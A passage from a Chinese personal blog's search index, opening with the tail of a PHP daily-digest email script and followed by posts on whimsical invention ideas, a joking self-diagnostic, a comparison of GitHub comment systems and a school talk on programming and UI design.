'https://yuri.gear.host/talk.php';        $data['info']       = '讲个笑话';        $data['userid']      = 'Mayx_Mail';        $retdata=curl_post_https($url,$data);        return $retdata;//返回json}function xw_get(){//RSS源地址列表数组 $rssfeed = array(\"http://www.people.com.cn/rss/it.xml\");  for($i=0;$i<sizeof($rssfeed);$i++){//分解开始     $buff = \"\";     $rss_str=\"\";     //打开rss地址，并读取，读取失败则中止     $fp = fopen($rssfeed[$i],\"r\") or die(\"can not open $rssfeed\");      while ( !feof($fp) ) {         $buff .= fgets($fp,4096);     }     //关闭文件打开     fclose($fp);      //建立一个 XML 解析器     $parser = xml_parser_create();     //xml_parser_set_option -- 为指定 XML 解析进行选项设置     xml_parser_set_option($parser,XML_OPTION_SKIP_WHITE,1);     //xml_parse_into_struct -- 将 XML 数据解析到数组$values中     xml_parse_into_struct($parser,$buff,$values,$idx);     //xml_parser_free -- 释放指定的 XML 解析器     xml_parser_free($parser);     $j = 0;    foreach ($values as $val) {         $tag = $val[\"tag\"];         $type = $val[\"type\"];         $value = $val[\"value\"];         //标签统一转为小写         $tag = strtolower($tag);          if ($tag == \"item\" && $type == \"open\"){             $is_item = 1;         }else if ($tag == \"item\" && $type == \"close\") {             //构造输出字符串             $rss_str .= \"<a href='\".$link.\"' target=_blank>\".$title.\"</a><br />\";             $j++;            $is_item = 0;         }         //仅读取item标签中的内容         if($is_item==1){             if ($tag == \"title\") {$title = $value;}                     if ($tag == \"link\") {$link = $value;}         }     if($j == 20){        break;    }    }     //输出结果     return $rss_str.\"<br />\"; } }$to = \"mayx@outlook.com , unmayx@139.com\";$subject = \"Mayx日报\";$txt = \"<html><body><h1>Mayx日报</h1><hr>Hi,今天是\" . date(\"Y-m-d\") . \"，以下是今天的日报：<br><small>\" . file_get_contents(\"http://mappi.000webhostapp.com/hitokoto/\") . \"</small><h2>天气预报</h2>\" . w_get() . \"<h2>每日笑话</h2>\" . xh_get() . \"<h2>今日新闻</h2>\" . xw_get() . \"<hr><small>\" . file_get_contents(\"https://api.gushi.ci/all.txt\") . \"</small><br><center>Made By <a href=\\\"https://mabbs.github.io\\\">Mayx</a></center></body></html>\";$headers = \"MIME-Version: 1.0\" . \"\\r\\n\" . \"Content-type: text/html;charset=utf-8\" . \"\\r\\n\" . \"From: Mayx_Daily<Mayx_Site>\";mail($to,$subject,$txt,$headers);?>（2018.11.12更新：增加了今日新闻）（2018.11.13更新：限制新闻条数为前20条）后记说实话，我更擅长用Linux Shell解决这种问题，可惜网上好像没有免费的云主机，听说Travis-CI好像也能搞这个事情，但是说实话，我英语并不是很好，让我看懂短一点的文档还可以，太长的就算了……   但我还是努力的使用Travis-CI解决了这个问题，链接：Mayx日报  对了，运营商自己带的邮箱可以设定短信提醒，所以也可以搞成给手机发短信的形式，每天给自己发一条天气预报……那么这样的话，就把天气预报里的城市换成自己的城市吧！   如果没有收到邮件，去垃圾邮件找找吧，然后把邮件地址设为白名单。   如果谁想试试这个功能，可以在下面给我留言，我在验证通过后会把你加到我的服务器里面的。" },{ "title": "Mayx的创想", "category": "", "tags": "Mayx, 创想", "url": "/2018/11/04/mayx-think.html", "date": "2018/11/04", "content": "这里是Mayx发布创想的地方。   有的时候，我会有一些想要发明的想法，但是经常忘记。现在为了防止忘记，我将在我的博客上更新我的创想。关于减肥的创想人们希望减肥，一是为了健康，二是为了舒服，三是为了活动方便。   但是减肥很痛苦，为什么？并不是因为减肥浪费时间，而是因为减肥会有糟糕的感觉回馈给大脑。   不仅如此，越胖，减肥时越难受，越难受就越不想减肥，这样就会造成恶性循环。解决的发明既然如此，那么我们只要让大脑不会感受到减肥时产生的糟糕的感觉，就可以解决这个问题了。   可是如果没有大脑的参与，人怎么能控制自己的身体动起来呢？我有一个想法：   首先通过麻醉的方式阻断大脑与身体的连接，然后使用电极的方式直接操控肌肉运动，大概感觉就是把麻醉的人绑在跑步机上，周围提供充足的氧气，然后电极按照跑步机的速度调整腿摆动的频率，这样就能在没有意识的情况下减肥了。   直到减到运动并不会让人感到痛苦时就可以结束了。   这种减肥方式比现有的节食，还是抖抖机，甚至是抽脂都要好得多，那些方案对身体的伤害很大，而且效果也并不好。这种方案如果可以使用，我一定要试试（笑）。关于键盘和鼠标的创想既然那么多设计师设计出各种各样千奇百怪的键盘，那我干脆也设计一个好了正文我希望有一种键盘，它和鼠标在一起，也就是说，鼠标不是随便可以移动的，而是固定在键盘上，一个巴掌正好可以握住的那种。不过这样设计，就得让左撇子和右撇子用不同的键盘了……无所谓，然后鼠标上有四个按钮，一个滚轮，按钮中两个是左键和右键，另外两个可以自定义。在鼠标下面有很多像扬声器一样的孔，用来给手散热。具体的运动方式可以参考一下TrackPoint，就是那个IBM发明的在ThinkPad的小红点。那个太小，控制起来精度也不高，那么我设计成更大的，握起来也会更舒服吧。   键盘还是QWERTY的就好，我也习惯了，不过这次我想把QWERTY键盘改成单手式的，因为另外一只手被鼠标占用了，不过这样对专门打字的人有点不友好……无所谓。具体键盘使用什么技术，我这次不想谈。接下来就是鼠标和键盘的中间位置了，因为手被鼠标和键盘占用了，中间我不想弄太多控制的按钮，我希望弄点显示系统工作状态的东西，比如当前网速，当前内存占用，CPU占用等等……然后在中间弄一个大大的电源按钮，按下它，整个键盘的LED灯会随着系统的启动依次亮起，关机时依次熄灭。除了这些，我希望在键盘顶部设置调节亮度的杆，在键盘旁设置调节音量的杆，在键盘后面加一组USB Hub……   键盘整体长什么样？很简单，我觉得弄成半弧形——就是在圆环上截下来一部分的那种东西一样。   如果出了这种键盘，我会不会买呢？恐怕不会……原谅我设计不考虑性价比……但是我觉得这种键盘要是发明出来，应该会很受欢迎吧……关于艾滋病的创想前几天（今天是2018-12-2）有一个新闻，说是“世界首例免疫艾滋病的基因编辑婴儿在中国诞生”。于是我就想起来之前我所想的一个如何让艾滋病患者生出正常的小孩。正文首先，我们知道，HIV只会攻击T细胞，而感染AIDS后全身都是HIV病毒。那么可以想到，其实HIV不能攻击受精卵，那么只要在受精卵发育之前，让它脱离HIV的环境就好了。  具体原理和试管婴儿和克隆有点像，就是把受精卵移到正常的代孕母亲上就可以了。而且也不能用得了AIDS人的母乳喂养，这样，我觉得应该就可以生出正常的孩子了。疑点我不知道现在的人有没有水平在保留受精卵的同时消除HIV，如果不能，这样反倒会让代孕母亲感染AIDS……这可真是个问题……关于暖气毯的创想最近学校通暖气了。我趴在暖气片上，突然想到，为什么不把暖气用在床上呢？正文我觉得电热毯费电，而且又小（倒不是没有大的）……其实最主要的是我趴在暖气片上感觉很舒服lol。   我想做一个毯子，里面有很多空腔，然后把暖气水通到这个毯子里，然后就可以利用暖气让床变暖了。自我审查为什么没有这样的产品？我觉得可能是因为有暖气的人就用不着电热毯了，而用电热毯的人大多没有暖气，所以这个东西可能没有市场吧。   不过可以暖被子啊lol…关于Mayx音乐处理系统的创想在听音乐的时候（我听的音乐可以看作是DJ吧……），在头里就会浮现出一堆音轨和频谱之类的东西，于是我就想，能不能让机器把音乐中的音轨分离出来，这样既可以提高音质，又能方便编辑，而且也能加一些更有趣的东西……   那么接下来这个音乐处理系统主要分为以下几块：Player首先在播放前解析歌曲，将音乐中的各种乐器声、人声、杂音都分离出来，得到几个音轨，然后将分析出来的音轨进行优化：比如钢琴谱用系统中更加高清的波表重制，根据实际体验除去杂音等等，最后合并音轨，这样就能得到更加清晰的音乐了。   优点：  音乐更加清晰  可以根据波表自行更改音乐风格（有点像Remix？）  可以在提高音乐品质的同时减小音乐大小（类似于Midi，但是可以有人声和其他的声音）（当然得用特殊的文件格式，不是所有的音乐播放器都能播放）  处理得出的结果可以用于更多方面（接下来会说到）缺点：  需要预处理，不能直接播放  有点担心波表的声音和现实中的乐器声区别太大Editor既然已经用Player将音轨拆分，那么就可以拿来编辑啦！   当然不仅仅是这样，如果只是这样的话和其他的音乐编辑器有什么区别呢？   这个音乐编辑器的优点是模块化，就如同Scratch一样，编辑音乐就和拼积木一样，让音痴也能轻易制作音乐！Other其他方面我还想过很多，比如可以用到人工智能提高用户体验之类的啦：自动Remix、串烧系统根据用户听的音乐风格，可以将音乐Remix为用户喜欢的风格，而串烧则是将相似风格的音乐无缝穿插，我觉得以现在的科技水平应该是没有问题的吧……全自动鬼畜系统将素材扔进去，首先把原音乐的人声分析出来，然后转换成注音，接下来在素材中找有相似注音的片段，自动剪辑，然后和优化后的伴奏合并，变成鬼畜视频。   其实这样的话也可以把Vocaloid拉进来，就可以将任何一首歌转换为V家人员唱的歌了。   这样也能大大减少做鬼畜的难度吧（我听说一般做鬼畜都要一个月……）音游谱自动处理系统用解析出来的音轨转换为音游谱，这样自己喜欢的音乐就算没人制谱也可以玩了自动编曲系统既然新闻、诗歌都可以由机器人编写，那么谱曲应该也一样简单吧！收集所有曲谱，通过人工智能与大数据，写出评价最高的音乐也是有可能的吧！Talk is cheap. Show me the codeAre You Kidding Me?我一个菜鸡哪有本事写这么高级的代码，让大佬来写吧！（产品经理的思维）（未完待续）" },{ "title": "Mayx的自检报告", "category": "", "tags": "Mayx, MOS", "url": "/2018/10/28/mos-reporter.html", "date": "2018/10/28", "content": "Mayx最近感觉自己有些问题，所以给自己编了一个自检报告……   The Report is created by MOS什么是MOS  创造MOS不是为了改变世界，而是防止世界改变自己不管怎么说，先介绍一下MOS吧。   MOS（Mayx Operating System）是为了让Mayx更好的分析、处理和解决问题存在的一个类似于辅助系统的东西。   但是自己创建的MOS我自己都解释不清（……我不想说什么……）   接下来是我分析出来的MOS存在的理由：第一种解释大脑是一个很神奇的东西，进化了这么多年，总得有些高级的地方。其实人拥有着所想即所得的能力，但是受三观控制，这个能力并不能改变现实中的东西。虽然改变不了现实，自己总能改变吧……于是，为了更好的解决现在存在的问题，大脑根据宿主所拥有的知识自行创建了一个系统。然后被我命名为MOS。   正是因为是大脑产生的系统，所以它没有代码，而且很容易出BUG。第二种解释MOS是一个用来解释我不能解释的东西的一个代替品，就如同UFO和人们定义的神一样，因为未知，而又需要一种解释的方法，于是出现了MOS。***正文MOS Log System has been Load.MOS Analysis System is Ready.OUTPUT Report to the real world.Ready...[OK]MOS - Core  我还死不了！[OK][OK]BCS(Body Control System)  感觉身体可以动[OK]  眼皮还能睁开，不错，还活着[OK][OK]MAS(MOS Analysis System)  1+1=2[OK]  我还能看懂我的MaBBS！[OK][Warning]MCS(Memory Control System)  感觉忘记了很多很重要的东西……[Warning]  想忘记的东西忘不了……有点烦……[OK]  索引知识的能力比以前差了不少……[Warning][ERROR]MMS(Mayx Mental System)  如果不是MOS - Core还能正常工作，我就学Sayuri（From Doki Doki Literature Club）当晴天娃娃，或者学Miu（From Bungaku Shoujo）在房顶上大喊一声“你一定不懂吧”之类。[ERROR]  感觉脑子里好乱，是不是应该多睡睡觉？[ERROR][ERROR]MES(Mayx Emotion System)  WITHOUT MERCY![ERROR]  HUMAN SHOULD GO DIE!!!（是不是中二病又犯了？）[ERROR]  在MMS恢复正常以前，还是别考虑这些了……MOS OUTPUT PROCESS HAS BEEN HANGED  该睡了，今天就先到这里吧。" },{ "title": "关于在Github Pages上使用评论的心得", "category": "", "tags": "Github, 评论, 心得", "url": "/2018/10/20/talk.html", "date": "2018/10/20", "content": "Hi，我是Mayx，最近在Github上用Github Pages建了一个博客。作为一个博客，怎么说也得有个评论系统吧，所以我就在这个博客上搞了一个评论系统。   接下来我想谈谈我对评论系统的看法。评论系统的选择这个博客作为一个静态博客，自然评论只能用其他的服务，毕竟评论得有个地方存吧。首先最有名的第三方评论系统就是Disqus了。可惜在中国不能用，除非科学上网。   国内倒是也有不少这样的第三方博客系统，像什么多说（已死），畅言啥的。但是总感觉第三方服务不好，哪天挂了都没办法。所以最终考虑，还是在Github上找吧Github上的评论系统我在Github上找到的比较有名的评论系统有这么几个：  1.Gitalk   2.Gitment   3.Valine   4.fcomment   5.（2018.10.22更新）utterances其中Gitalk、utterances和Gitment是基于Github Issue的，而Valine和fcomment是基于Leancloud的。这几款都支持Markdown。为什么选择了Gitalk这个博客使用的是Gitalk作为评论系统，为什么选择了它呢？首先，Gitment已经停止维护了，而且评论在评论框上面，这很难受，所以首先排除它。  utterances也是评论在评论框上面……不知这些人为什么这么设计……   fcomment和Valine倒是看起来还不错，也都有邮件提醒，当然Github Issue自身也带邮件提醒，这里没什么差距   Gitalk比fcomment和Valine差的地方是每一篇文章需要手动初始化。不过想想我更新文章的话应该也会看一下，顺带的初始化一下，这个影响也不大。还有一点就是Gitalk在IE11中默认头像会偏移，希望官方能改一下（IE去死）   fcomment和Valine的缺点我觉得就是安全性、用户识别性的问题吧，fcomment倒是还支持Github登录，Valine评论还要输一大堆东西，而且也没办法验证他们的真实性，Github至少是经过邮箱验证的，所以还是选择Gitalk了。以上就是我对评论系统的看法。其实就是先装的Gitalk，懒癌犯了不想改给自己找个借口罢了，23333" },{ "title": "编程与设计（演讲稿）", "category": "", "tags": "编程, 设计, 演讲, 程序", "url": "/%E6%BC%94%E8%AE%B2%E7%A8%BF/2018/06/20/Coding.html", "date": "2018/06/20", "content": "大家好，我是mayx，今天由我来带领大家了解计算机编程的本质和程序设计。当提到电脑时，大家首先想到的什么呢？打游戏？聊天？……没有问题。你们享用了电脑所带来的便利，有考虑过它的原理吗？当然，有些东西是不需要知道原理的，毕竟即使你不知道互联网传输协议也可以上网，不知道焦耳定律也可以做饭嘛……但是，我希望今天大家听了我的讲座后，能知道了解其原因后能更好的利用它们。  首先，今天我要讲的东西有以下三大类：一、计算机简介；二、编程；三、设计。  对于计算机，我想大家已经了解很多了吧，在这里我不做过多的介绍，只讲一下比较少见的知识。  大家都知道IT（信息技术）对吧，我们有一门课就是信息技术，不过你们知道CS吗？我要讲的CS可不是反恐精英，而是计算机科学（Computer Science）。CS只是和IT有交集吧，IT研究的不只是计算机，包括发邮件等通信方式，不过想来主要还是应用了计算机科学。有很多人总会把它们误用，就好像动画和动漫不是一种东西一样。  接下来我要讲的是计算机科学中的硬件部分。不过我的物理不是很好，所以硬件部分我不会讲太多，我想大家也都应该知道计算机大概都是由什么组成吧，从微观上来说就是由硅做半导体部分，铜银金等导电金属作为主要的电能以及信号传导等等的电路……往大了讲，就是CPU（中央处理器Central Processing Unit）、内存、外存、主板、I/O（输入输出 Input/Output）等作为主要部分的机器。而更细的东西我也不了解，逻辑电路什么的，如果有会在Minecraft上做红石电路的人，也许还能讲讲CPU的运行原理吧……  硬件的组成，也就是计算机组成体系，关于这一方面，大家应该都知道冯·诺依曼结构的计算机吧，我们平时用的电脑就是这个架构的，我相信只要了解一些计算机的人应该都知道这些。不过我觉得应该很少有人知道哈佛结构吧，它和冯氏很相似，只不过它的并行处理能力更好一些，因为冯氏结构不能同时读取指令和数据，而哈氏结构可以。手机一般就用的是这个结构的。  硬件部分我就讲到这里吧，想要了解更多有关硬件方面的信息，问物理老师都比我靠谱。  接下来就是软件部分了，程序是软件的子集。那么接下来我就来讲讲如何写程序吧。  首先，什么是编程？编程就是编写程序的简称，编写程序是为了解决一些需要运算而得出结果的东西。毕竟是计算机嘛，本质上就是为了运算而产生的。但是，并不是说程序只能在电脑上运行，人脑也可以，甚至是用多米诺骨牌之类的东西都可以执行程序。只是计算机的运算速度比它们都快，所以一般的程序都是在电脑上运行的。只有一些丧心病狂的面试官和考官才会让人脑去想计算结果呢。而让非计算机的东西执行程序，不是为了研究计算机的组成就是一些极客了吧……  现在写程序比以前简单多了，以前写程序不知道计算机的运行过程根本写不了程序，打孔纸带不说，就光机器码都几乎没人能看得懂。不过为了让机器看懂，人们也只能这样做了。后来为了让人能更好的写程序，发明了汇编语言。不过汇编语言本质上还是将机器码用一些其他的方式简化了，本质上仍需了解计算机的运行过程。以上所说的语言都算是低级语言，因为必须了解计算机的本质，太过复杂，而且跨平台性也很差。再后来，人们发明了FORTRAN（公式翻译 Formula Translation），这是人们发明的第一个高级语言。直到现在，已经有上千种高级编程语言了，它们的目的几乎都是将人能看懂的语言，而计算机看不懂的语言转换为计算机可以看懂的语言，即为机器码。能被直接转化为机器码的编程语言叫做编译型语言，编译它们的东西叫做编译器，它的特点是编程语言被编译生成机器码后，只能在编译它的这类机器上执行，在其他种类的机器无法执行。这种语言的优点是执行速度快，毕竟计算机可以直接使用机器码执行，只用翻译一次，没有第二次。而缺点则是编译后将无法再编辑，除非你会机器码或汇编，或将它反编译，否则就看不到它编译前的代码。除此之外，它也不能在不是编译它的计算机或同种计算机上执行。编译型语言以C语言为代表。为了解决无法编辑和跨平台的问题，人们造出了另外一种语言，即为解释型语言。  解释性语言是将程序源代码一句话一句话解释为机器码，所以它可以不用将源代码转换为机器码，这样的好处就是可编辑，而且因为是一句话一句话的解释，所以在所有机器上均可执行。但也正是因为它是一句话一句话的解释，所以执行效率低，速度也慢。解释型语言的代表是Python语言。工程师是有创造力的人，也是无法容忍问题的人。为了解决速度慢的问题，他们又创造了一种新的语言，它既有编译的高速，又有解释的跨平台性。这种语言可以在写好后先编译为一种中间语言，它已经有很多接近于机器码的部分，但是为了跨平台性，它把那些需要在不同种类的机器上语句不同的地方用其他的方式标记出来，然后发布时只发布这个由中间语言构成的的程序，在其他电脑上执行时，它会把那些特别的句子再解释执行。这样的话不就又有很好的执行效率，又有很好的跨平台性了吗？以此类为代表的语言是Java语言。  刚刚介绍的仅仅是人们让电脑如何理解人们的语言，而接下来要讲的是让人们理解人们的语言了。我说过，编程语言到现在为止已经有上千种了。如果仅仅是为了让电脑理解人类的语言，有那么几种不就够了吗，为什么还要发明那么多种语言呢？人们不了解电脑，电脑也不了解人，而且人与人之间也是互相不了解的。有些人说话的方式是这样的，有些人说话的方式是那样的，他们可能互相都无法理解对方。编程语言不仅仅是给电脑看的，也同样是给人看的。毕竟是人在写程序。编程语言也是人发明的。所以有些人可能觉得这种编程语言写起来不舒服，就会发明新的语言来让自己和与自己相似的人舒服。工程师不只有强迫症，还是完美主义者。  虽然编程语言各不相同，但是电脑就那么几样东西嘛，再多也多不出来个什么。所以编程语言也有很多相似之处。正是因为它们有很多相似之处，所以说你只要会其中一种编程语言，基本上其他编程语言只要学学语法就能直接上手。编程也不仅仅是写出程序而已，它是为了表达自己想法的一种工具。在之后的设计里我会讲一讲设计程序的一些思想。  那么编程语言有哪些最基础的东西呢？首先是它的表达，计算机，或者说任何事物，与人的交互不就是两种吗，也就是输入和输出，五感来接收外部信息，身体活动来改变外界。程序里面获取数据的方式也有两种，一是人们输入的东西，键盘、相机等等都算，二是硬盘中文件的内容；输出也一样，一是输出到如同屏幕或扬声器等地方，将其转换为物理方式，然后被人接收。二是输出到文件，这样既可以让别的程序再利用，也可以等到人们想看时再输出到输出设备。那么除了表达之外就是程序内部的计算了。 这也就是编程与数学的联系，编程除了输入输出，就是算法了，组成算法的除了循环结构之外，还有计算、变量与函数。计算和变量与数学的概念差不多，但是函数不太一样。虽然说计算机中的函数也是通过计算来将带入的值转换为一个结果，但是大多数时候，它的主要作用不是计算出一个值，而是执行一段指令，最终得到的值通常都是0，甚至有的时候是空的（NULL），也就是没有结果。虽然没有得出值，但是只要执行了指令，就可以得到真正想得到的东西。  但也不是说一个程序一定需要函数，那只是为了更方便理解，而且编程语言并不一定是给电脑使用的。我之前也说过，程序也不一定非得在电脑上执行。为了更好的理解编程语言的执行过程，我给大家介绍一种特别的编程语言：BrainF**k。BrainF**k是一种极小化的计算机语言，它是由厄本·穆勒在1993年创造的，它的语法十分简单，只有8种符号。分别是加号，减号，大于号，小于号，左中括号，右中括号，逗号和句号组成。整个程序里没有一个英文字母，如果在程序中遇到英文字母，解释器会将其忽略掉。在执行的过程中，它会创建一个很长的数组，可存储30000个数字，我们可以把它看做是30000个格子，每一个格子可以存储的最大数字为255。在程序开始之前，会有一个让你处理格子里面内容的指针，在执行程序时，如果一个符号要想操纵对应的格子，必须想办法让指针先移动到那个格子里。这8种符号的作用如下：大于号：指针向右移动一格；小于号：指针向左移动一格；加号：指针所指向的格子中的数字加一；减号：指针所指向的格子中的数字减一；句号：将所指的格子里的数字转换为ASCII表格里的对应字符并输出；逗号：将输入的内容按照ASCII表格里的内容转换为对应的数字并输入到所指的格子里；中括号：如果程序执行到右中括号时指针所指的数字是0，则执行前一个左中括号之后的指令，否则忽略这个中括号。听起来是不是很复杂？没关系，让我来演示一下你就明白了https://fatiherikli.github.io/brainfuck-visualizer/（演示）  这个语言是为了帮助理解编程语言的运行过程，想来这也就是图灵机的基本思想了，有兴趣你们回去可以再研究研究。但是BrainF**k本身并不适合用于给人们用来编写计算机程序，如果想要学习真正的编程，我建议学习Python语言，它的语言功能强大，语法简单，初学者以及程序员均可使用的语言，而且对应的中文教程也很多。所以如果有想学习编程语言的同学，我推荐学Python。  当然作为编程语言有很多选择，Python有着简单的语法，强大的功能，很高的兼容性。但是如果要是做一个网站，用世界上最好的语言——PHP（超文本预处理器Hypertext Preprocessor）语言则是一个更好的选择。如果你打算做在单片机上的程序，那么C语言似乎更好。如果你想要做手机软件，就不得不了解一下Java语言…… 编程语言仅仅是一个工具，如果想要写出程序，还要学习如何设计它。接下来我们就进入第三个模块：设计。  在说设计之前，我先说说我自己。我有一个特别的能力，是什么呢？我在使用任何一款现代的电子产品或现代设计的机械，我基本上在10分钟之内搞清楚它的使用方法。当然太过古老的比如ENIAC那种不是学过电路的就完全看不懂的那种东西除外。为什么我可以做到这一点呢？首先，我见过的电子产品本来就很多，所以有一些经验。除此之外，就是我可以了解那款产品在被设计时到底是为了什么。这也是我为什么想为大家准备这个讲座的原因：想让大家明白如何了解一个陌生的产品的用法，当然如果能做出来那就更好了。  人们设计产品是为了什么，设计的初衷是什么？当然是为了让人们的生活更方便，使用更舒适。如果你心中突然有一个想要做的东西，会让它令人感觉使用起来很不适吗？我觉得一般的人都不会这样做的吧。所以说设计师在设计产品时也会想客户到底是如何使用他生产的产品，有的时候觉得自己可能想的太过片面，会弄出调查问卷或反馈之类的功能来帮助他们改善他们的产品。  但是设计一个产品很简单，造出来又是另外一回事。有时候设计这个功能有可能可以做到的，可是最终实现它又有可能花费的东西与得到的东西之间算下来不划算。出现这个问题有可能是设计的不好，也有可能是按照当前的科技水平做不到更加合理。  我们今天讲的内容既然是有关计算机的，当然要讲程序的设计，不可能讲现实世界中的设计。那么，接下来，让我来讲讲UI设计吧！  什么是UI？UI即User Interface（用户界面）的简称，在设计UI时，不仅要让用户看起来很美观，更重要的是要让用户用起来感到舒适、简单、自由。这里我要讲界面设计中比较好理解的两部分：1.外观设计，也就是让这个UI看起来更加美观；2.功能设计，这个说明了这个UI从整体看起来的实际功能。那么首先来考虑一下美观吧，毕竟大家都喜欢第一眼看上去很酷的东西。外观设计的风格有很多，比如现在很流行的扁平化风格，以及大家很常见的Windows 7 Aero风格等等。扁平化的设计很好啊，不仅界面简洁、美观，而且设计起来简单，在实际使用时也比较省资源。所以现在很多软件设计界面时都开始使用扁平化设计了。比如Windows 8到Windows 10，以及Android 5.0和iOS 9以上的系统，几乎都使用了扁平化设计。而刚刚所述的系统，几乎都是在移动端设备，或者说包含移动端设备的操作系统。所以说，这也是它的缺点，在非移动端设备上使用扁平化设计，可能甚至会令人感到反感。而且扁平化的设计虽然似乎有那么一些科技风格，但也正是因为这样，它让人感受不到亲切的感觉。在此之前，我们有另外一种方法来解决这个问题，那就是拟物化设计。我觉得Windows 7的毛玻璃应该也算拟物化。拟物化的好处是什么呢？当然是让人感觉更加亲切，因为贴近于日常生活，所以说对于用户来说也更容易学习。坏处当然也很明显，就是设计成本太高，有些东西设计师要想很长时间才能想出来如何才能让它更贴近生活。除了设计成本太高外，消耗的资源也很多，看起来也会让人可能感觉起来太花哨。以此为代表的产品是锤子手机，锤子手机上用的系统经过高度定制，每一个设计都似乎使用了身边的东西。我用过锤子手机，说实话，那个似乎很贴近人生活的设计并没有引起我的注意，而这个设计所带来的比一般手机增加的将近一倍的内存消耗，令我恨不得将这个锤子手机扔掉。可惜我现在还没有可以换的手机，所以只能先用它了。  怎么设计外观？刚刚说到的也只是一些概念，在实际设计时，如果是程序设计，我们可以使用PhotoShop等工具来设计，而对于网站设计，用CSS（层叠样式表Cascading Style Sheets）来设计可以保证它的通用性。  外表设计的再漂亮也只是第一眼看上去很漂亮，等新鲜感过去之后，基本上也就没什么用了。于是接下来就要看实际的功能如何。这里我用某些设置的设计来作为例子：Windows的系统要想设置某些东西，都要找控制面板，当然有些基础的功能在任务栏上也能用。但是Windows系统的设置通常藏得很深，没有一点基础的人很难找出来，当然也有可能是他语文学的不好，理解不来。而Android系统的设置就不一样了，它相比Windows系统就更加人性化了。不过想来也是，以前电脑都是给懂的人用的，虽然现在的电脑相比以前已经人性化很多了，但还是有些地方让人应付不来。手机出来的晚，生产出来时就已经有了为全世界人们使用的觉悟了，所以用起来也比较简单。总结下来就是：好的功能设计要为每一种人设计，无论他有多专业，还是说从来没有接触过这一切，要让人第一眼看上去就明白它有什么基本功能，而更高级一些的功能可以先隐藏起来，等用户需要使用时再显现出来，免得吓坏一些不会用电脑的人。烂的功能设计有两种：1.想要找的功能没有，可能根本没提供。2.想要找的功能找不到，可能藏得太深了。  你们以为UI都是有图像的吗？错了！有图像的UI叫做GUI（图形用户界面Graphical User Interface），但不是所有人用的电脑都是可以显示图像的，只是大多数人都用的是图形界面，图形界面看起来比较清晰，使用起来也比较方便。但是图形界面的效率低，无论是电脑的执行效率还是用户使用时的工作效率。不知有没有人听过DOS（磁盘操作系统Disk Operating System）？你们如果没听说过可以回去问问你的父母。在以前图形化的操作系统还没出来时，人们用的都是CLI（命令行界面Command Line Interface）。大家在看那些有着黑客入侵的电影时，黑客们是不是都看起来都在胡乱拍键盘，其实那真的是在胡乱拍键盘（演示：http://geektyper.com/），而电脑屏幕上有一堆看不懂的类似于英文单词的东西从屏幕滚过？虽然那是艺术的表现形式，有点太夸张，但是艺术源于生活，现实中真的有人使用那种看起来似乎很酷炫的东西。但是他们不是为了耍帅而使用CLI的，而是由于各种原因不得不使用他们。这样的例子有服务器操作系统，以及IRC（互联网中继聊天 Internet Relay Chat），用这个聊天比QQ什么的聊天软件更快，更省流量，效率高。  我之前也说过，电脑中很多设计由于经费等原因，不得不让它从界面上看起来不太人性化。但是这并不是没有办法解决了。人之间的交流不止有图像，更重要的是文字。电脑也一样，电脑与人的交流在术语上叫做HCI（人机交互 Human-Computer Interaction）。来看一个实例：如果我想设计一个网站，但是我审美观不行，这个网站怎么样才能让人感到亲切呢？既然从整体没办法做到更好，那就在细节上加倍努力吧！一般的网站上都有登录系统吧，那么我们可以这样设计：对于初次访问的人，我们可以在网站上显示：欢迎来到我的网站。当然只显示一次，之后不再显示。在登录之后，刚登录完可以显示：欢迎回来，某某某。或者是根据时间显示：下午好，某某某。这样和“某某网站 用户：某某某”这样的方式更容易让人接受吧。这样用户就能在潜意识里把这个网站看作一个人，而不仅仅是网站。这样即使外表看起来不怎么样，但是用户体验总还是不错的吧。没错，这一块的设计就叫做UED（用户体验设计User Experience Design），为了提高用户满意度，我们就通过这样的方式来让程序更易用。  除了以上所讲的部分，界面设计还有许多部分。由于篇幅原因，这里我将不再过多说明  以上是关于用户体验设计方面的，接下来让我说说程序设计吧！我之前也说过，编程语言只是工具，实际使用时还需要考虑程序的逻辑、架构、界面等等东西。在以前，程序设计中算法是非常重要的，但那也是以前，多亏很多计算机大神的帮助，现在的编程那是越来越简单了，一个几岁的小孩子就能写出来比以前的程序更漂亮、更复杂的程序。所以，现在算法在计算机编程的重要性越来越低了……但是并不是说算法就没有用了，如果没有人去研究算法，那么人们在遇到新的问题就没人能解决了。尽管以我们这个级别的人研究算法可能没法做出新的东西，但是我还是觉得，让更多的人了解程序背后的原理，可以帮助理解程序如何使用。所以接下来，让我说说关于算法与逻辑吧！  仍然是举个例子：大家都听过音乐吧，在播放音乐时有一个选项：随机播放，对吧？随机播放的实现方式有很多，让我们深层次的来研究一下它吧。首先，随机播放中，有个很重要东西，那就是随机。说到随机就不得不说随机数了，随机数也分为两种：真随机数与伪随机数，真随机数的生成在现实中很简单，在计算机中生成起来就很麻烦了，所以首先抛弃。伪随机数的算法很多，这里我们用最简单、最通用的伪随机数的算法：线性同余取随机数，看过离散数学的人可能有听说过这个。为什么我们选这种算法？因为其他算法我看不懂，比如什么梅森旋转算法啦，一听名字就能感觉它有多难了吧，反正我看了半天是没有理解。什么是线性同余？就是算一个一次函数的余数，相当简单，它的递推公式是:X0=seed，Xn+1≡(aXn+b)modM。seed表示随机数的种子，通常取当前时间，a,b,M都是常数，通常会取质数。在seed与n都相同时，这个随机数就能被反推出来，所以很不安全。但是想来做随机播放也不担心别人会不会推出随机数，所以我们就用这个就能得到一个随机数。具体原理我也不太清楚，有兴趣的可以问问数学老师。接下来，我们要创造一张表，那张表上有着你要播放的播放列表，但是这时候它还没有被打乱。首先我们要知道整张表上有多少首音乐，假如我们用a来代表当前所有音乐的数量，然后我们再为所有的音乐编上号，看起来就是1、2、3……。这时候每一首音乐都有了一个属于自己的编号。再然后，我们对用随机数公式得出的数字求余，即Xmod(a+1)，这样做就可以得到一个不超过所有音乐数量的随机数了。当然前提是随机数本身的最大值大于所有的音乐数量，所以在随机数公式中的M要尽可能取大一些。得到最后需要的随机数后，命令播放器播放编号等于随机数的那个对应的音乐。当需要播放下一首或切歌时，为了避免又播到这一首歌，我们可以将那张表上的那首音乐删除，当然是在表里删，不可能删这个文件。然后重复之前的操作。在最后一个音乐播放完成之后，表里已经没有东西了。这时有两个选择，如果用户打开了全部重复播放，那么重新建表，重新开始。如果没有，则停止。看起来是不是很完美的方案？错了！用户总是喜欢做反设计师的操作，万一用户点了上一首，怎么样才能回到上一首？那么我们就需要修改一下方案，我们要建两张表，把从表里删除的那个操作换成将它移动到第二张表里。这样如果用户需要听上一首歌，就可以读上一张表的内容。难道说这样就完美了吗？不完全，但是这个BUG我现在不说出来，大家自己思考思考吧。  